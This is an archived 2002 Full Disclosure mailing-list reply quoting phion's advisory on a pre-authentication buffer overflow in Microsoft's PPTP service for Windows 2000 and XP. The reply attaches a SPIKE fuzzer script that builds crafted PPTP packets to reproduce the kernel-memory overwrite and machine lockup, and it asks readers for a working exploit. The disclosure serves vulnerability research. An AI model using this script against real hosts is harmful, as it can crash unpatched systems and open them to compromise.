Full Disclosure mailing list archives
Re: Microsoft PPTP Server and Client remote vulnerability
From: dave () immunitysec com (Dave Aitel)
Date: 26 Sep 2002 16:13:21 -0400
--=-Z8MqZG1lgavBJqQPhhF6 Content-Type: multipart/mixed; boundary="=-ATvJ0x+eIz+8WY9PMqyn" --=-ATvJ0x+eIz+8WY9PMqyn Content-Type: text/plain Content-Transfer-Encoding: quoted-printable SPIKE 2.6.2 or above should be able to handle this .spk file which will replicate the vulnerability. Someone send me a working sploit in exchange, please. I'm too lazy to muck with it. (Or I have other exploits to muck with, one or the other :>) -dave P.S. Grab new SPIKE releases (2.6.2 for SPIKE and 1.3 for SPIKE Proxy) at http://www.immunitysec.com/spike.html, if you haven't already.=20 P.P.S. This script is released under the terms of the GNU GPL v 2.0. On Thu, 2002-09-26 at 05:43, sh () phion com wrote:
phion Security Advisory 26/09/2002 =20 Microsoft PPTP Server and Client remote vulnerability =20 =20 Summary ----------------------------- =20 The Microsoft PPTP Service shipping with Windows 2000 and XP contains =
a
remotely exploitable pre-authentication bufferoverflow. =20 =20 Affected Systems ----------------------------- =20 Microsoft Windows 2000 and XP running either a PPTP Server or Client. =20 =20 Impact ----------------------------- =20 With a specially crafted PPTP packet it is possible to overwrite kerne=
l
memory. =20 A DoS resulting in a lockup of the machine has been verified on Windows 2000 SP3 and Windows XP. =20 A remote compromise should be possible deploying proper shellcode, as we were able to fill EDI and EDX with our data. =20 Clients are vulnerable too, because the Service always listens on port 1723 on any interface of the machine, this might be of special concern to DSL users which use PPTP to connect to their modem. =20 =20 Solution ----------------------------- =20 As a temporary solution for the Client issue, one might firewall the P=
PTP
port in the Internet Connection Firewall for Windows XP. =20 We dont know of any solution for Windows 2000 and Windows XP PPTP serv=
ers.
=20 The vendor has been informed. =20 =20 Acknowledgements ----------------------------- =20 The bug has been discovered by Stephan Hoffmann and Thomas Unterleitne=
r
on behalf of phion Information Technologies. =20 =20 Contact Information ----------------------------- =20 phion Information Technologies can be reached via: office () phion com / http://www.phion.com =20 Stephan Hoffmann can be reached via: sh () phion com =20 Thomas Unterleitner can be reached via: t.unterleitner () phion com =20 References ----------------------------- =20 [1] phion Information Technologies http://www.phion.com/ =20 Exploit ----------------------------- =20 phion Information Technologies will not provide an exploit for this is=
sue.
=20 =20 Disclaimer ----------------------------- =20 This advisory does not claim to be complete or to be usable for any purpose. =20 This advisory is free for open distribution in unmodified form. =20 Articles or Publications that are based on information from this advis=
ory
have to include link [1]. =20 =20
--=-ATvJ0x+eIz+8WY9PMqyn Content-Disposition: attachment; filename=pptp.spk Content-Type: text/plain; name=pptp.spk; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable //start control request s_block_start("PPTP"); s_binary_block_size_halfword_bigendian("PPTP"); //message type 1 - control request s_int_variable(0x0001,5); //cookie s_binary("1a 2b 3c 4d"); //type 1 - start control request //5 is big endian halfword s_int_variable(0x0001,5); //reserved s_binary("0000"); //version 1.0 s_int_variable(0x0100,5); //reserved s_binary("0000"); //Framing: Ethernet s_binary("00000003"); //Bearer: Digital s_binary("00000002"); //maximum channels s_binary("ffff"); //firmware revision s_int_variable(0x0001,5); //hostname s_string_variable("A"); s_binary_repeat("00",63); //vendor s_string_variable("A"); s_binary_repeat("00",63); s_block_end("PPTP"); /// /// NEXT PACKET /// /// //start outgoing call request s_block_start("PPTP2"); s_binary_block_size_halfword_bigendian("PPTP2"); //message type 1 - control request s_int_variable(0x0001,5); //cookie s_binary("1a 2b 3c 4d"); //type 1 - outgoing call request //5 is big endian halfword s_int_variable(0x0007,5); //reserved s_binary("0000"); //call id s_binary("0000"); //serial number s_binary("0000"); //min bps s_binary("00000960"); //max bps s_binary("00989680"); //bearer capabilities s_binary("00000002"); //framing s_binary("00000003"); //recieve window size s_binary("0003"); //processing delay s_binary("0000"); s_binary_block_size_halfword_bigendian("PHONENUMBER"); //reserved s_binary("0000"); s_block_start("PHONENUMBER"); s_string_variable(""); s_block_end("PHONENUMBER"); //subaddress s_string_variable(""); s_block_end("PPTP2"); --=-ATvJ0x+eIz+8WY9PMqyn-- --=-Z8MqZG1lgavBJqQPhhF6 Content-Type: application/pgp-signature; name=signature.asc Content-Description: This is a digitally signed message part -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQA9k2phB8JNm+PA+iURAqm7AJsE25Xs+qBtfAmxnXsdtIGt1oxm6gCg04iX alcRcjRAYoVrPGnYrPxPDxk= =3TKd -----END PGP SIGNATURE----- --=-Z8MqZG1lgavBJqQPhhF6--
Current thread:
- Re: Microsoft PPTP Server and Client remote vulnerability Dave Aitel (Sep 26)